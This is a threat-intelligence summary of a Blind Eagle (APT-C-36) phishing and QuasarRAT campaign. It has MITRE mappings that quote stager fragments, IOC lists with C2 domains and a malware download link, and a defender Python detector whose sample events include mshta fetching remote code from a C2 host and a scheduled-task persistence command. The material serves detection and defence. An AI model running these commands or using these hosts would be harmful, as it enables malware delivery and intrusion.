Blind Eagle (APT-C-36) has intensified its Ecuador-focused campaign with an upgraded infection chain, delivering a QuasarRAT-based payload via a password-protected LHA package and multiple stages. The operation combines geo-filtered phishing, a MediaFire drop, and living-off-the-land techniques (mshta) to evade analysis and target financial institutions in Latin America.
#BlindEagle #QuasarRAT #upxsystems #MediaFire #Mshta #PowerShell #Python
Keypoints
- Blind Eagle is a financially motivated APT (APT-C-36) expanding its operations in South America, including a new Ecuador-focused campaign.
- The group uses phishing emails that impersonate government entities, sometimes combining a malicious link with an attached PDF.
- Victims are geo-filtered via a shortened URL; non-Colombian origins are redirected to innocuous government sites, while Colombian-origin requests proceed to infection.
- The infection chain in Colombia leads to a MediaFire-hosted, password-protected LHA payload containing a .NET QuasarRAT executable.
- QuasarRAT is customized by the actors (Spanish-named functions) and is used to intercept banking activity; several Latin American banks are targeted.
- In an Ecuador-specific case, the chain uses mshta to download and execute VBScript/HTML code, then PowerShell and Python-based stages, with persistence via scheduled tasks.
- The attack chain includes multiple C2 elements (systemwin.linkpc.net, laminascol.linkpc.net, upxsystems.com) and multiple obfuscated payloads (mp.py, ByAV2.py, InMemoryMeterpreter).
MITRE Techniques
- [T1566.001] Phishing – Initial access via targeted emails purporting government affiliation, sometimes with both a link and an attachment. Quote: “phishing emails pretending to be from the Colombian government. One typical example is an email purportedly from the Ministry of Foreign Affairs…”
- [T1105] Ingress Tool Transfer – Downloading and delivering the malware executable from a file-sharing service (MediaFire). Quote: “The server responds to the client with a file for download. This is a malware executable hosted on the file-sharing service MediaFire.”
- [T1027] Obfuscated/Compressed Files or Information – Password-protected LHA archives and obfuscated scripts to hinder analysis. Quote: “The file is compressed, similar to a ZIP file, using the LHA algorithm. It is password-protected…”
- [T1218.005] Mshta – Abuse of the MSHTA utility to download and execute the next stage, with embedded VBScript/HTML. Quote: “mshta is a utility that executes Microsoft HTML Applications, and the attackers abuse it here to download and execute the next stage, which contains VBS code embedded in an HTML.”
- [T1059.005] VBScript – VBScript content delivered via the HTML stage and used by the dropper. Quote: “CreateObject("Wscript.Shell").run…IEX(-join $a3)”
- [T1059.001] PowerShell – OS/version-specific PowerShell stagers that download and execute further scripts. Quote: “powershell.exe -noexit "…IEX(-join $a3)"”
- [T1059.006] Python – A Python-based infection stage (PyInstaller-built) consisting of a loader and two Python scripts. Quote: “import os import subprocess import ctypes”; the “StartA” PowerShell script selects and runs the Python components.
- [T1053.005] Scheduled Task – Persistence by creating a scheduled task to run every 10 minutes. Quote: “…a scheduled task that will run every 10 minutes.”
- [T1562.001] Impair Defenses – Attempts to disable security tools and processes during infection. Quote: “The malware will try to kill all processes related to the infection.”
- [T1071.001] Web Protocols – C2 communications over web protocols (e.g., tcp://systemwin.linkpc.net:443). Quote: “a normal Meterpreter sample in DLL format that uses ‘tcp://systemwin.linkpc.net:443’ as a C2 server.”
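As an added defender-side illustration (not code from the report or from Check Point), the following Python checks constructed process-creation events against the behaviours listed above: mshta fetching a remote HTA, the -noexit/IEX(-join) PowerShell stager, the 10-minute scheduled task, and command lines that reference the C2 hosts named in the report. The sample events, task name and file paths are constructed for the example.

```python
import re

# Constructed sample process-creation events (not taken from the report); the
# fields mimic a Sysmon Event ID 1 / EDR export: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": "outlook.exe", "image": "mshta.exe",
     "cmd": "mshta.exe https://upxsystems.com/inicio0"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -noexit "$a3=...;IEX(-join $a3)"'},
    {"parent": "powershell.exe", "image": "schtasks.exe",
     "cmd": "schtasks /create /sc minute /mo 10 /tn Updater /tr C:\\Users\\Public\\StartA.ps1"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmd": "mshta.exe C:\\Program Files\\Vendor\\help.hta"},   # benign local HTA
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},    # benign admin script
]

# C2 hosts named in the report; any command line referencing them is suspect.
C2_HOSTS = ("systemwin.linkpc.net", "laminascol.linkpc.net", "upxsystems.com")

def _cmd_has(e, pattern):
    return re.search(pattern, e["cmd"], re.IGNORECASE) is not None

def mshta_remote(e):
    # mshta pulling an HTA over HTTP(S) is the stager behaviour described above.
    return e["image"] == "mshta.exe" and _cmd_has(e, r"https?://")

def ps_noexit_join_iex(e):
    # -noexit combined with IEX(-join ...) matches the quoted PowerShell stager.
    return (e["image"] == "powershell.exe" and _cmd_has(e, r"-noexit")
            and _cmd_has(e, r"IEX\s*\(\s*-join"))

def task_every_10_min(e):
    return e["image"] == "schtasks.exe" and _cmd_has(e, r"/sc\s+minute\s+/mo\s+10\b")

def references_c2(e):
    return any(h in e["cmd"].lower() for h in C2_HOSTS)

RULES = {"T1218.005 mshta remote HTA": mshta_remote,
         "T1059.001 PowerShell -noexit IEX(-join)": ps_noexit_join_iex,
         "T1053.005 task every 10 minutes": task_every_10_min,
         "known C2 host in command line": references_c2}

def detect(events):
    """Return [(event index, [names of rules hit])] for events matching any rule."""
    hits = []
    for i, e in enumerate(events):
        names = [name for name, rule in RULES.items() if rule(e)]
        if names:
            hits.append((i, names))
    return hits

if __name__ == "__main__":
    for i, names in detect(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmd"], "->", names)
```

In production the same rules would run over the parent/child relationship as well (for example mshta spawned by a mail client), which is a stronger signal than the command line alone.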
Indicators of Compromise
- [URL] gtly.to/QvlFV_zgh – Shortened dropper URL used for the geolocation redirect. Context: geolocated infection control.
- [URL] gtly.to/cuOv3gNDi – Shortened dropper URL. Context: geolocation redirect.
- [URL] gtly.to/dGBeBqd8z – Shortened dropper URL (Py2EXE). Context: geolocation redirect.
- [Domain] laminascol.linkpc.net – QuasarRAT C2. Context: C2 for QuasarRAT payload.
- [Domain] systemwin.linkpc.net – Meterpreter C2. Context: C2 for Meterpreter stage.
- [Domain] upxsystems.com – Ecuador mid-infection C2. Context: C2 hosting additional payloads.
- [URL] https://www.mediafire.com/file/cfnw8rwufptk5jz/migracioncolombiaprocesopendienteid2036521045875referenciawwwmigraciongovco.LHA/file – LHA download link. Context: primary dropper.
Read more: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/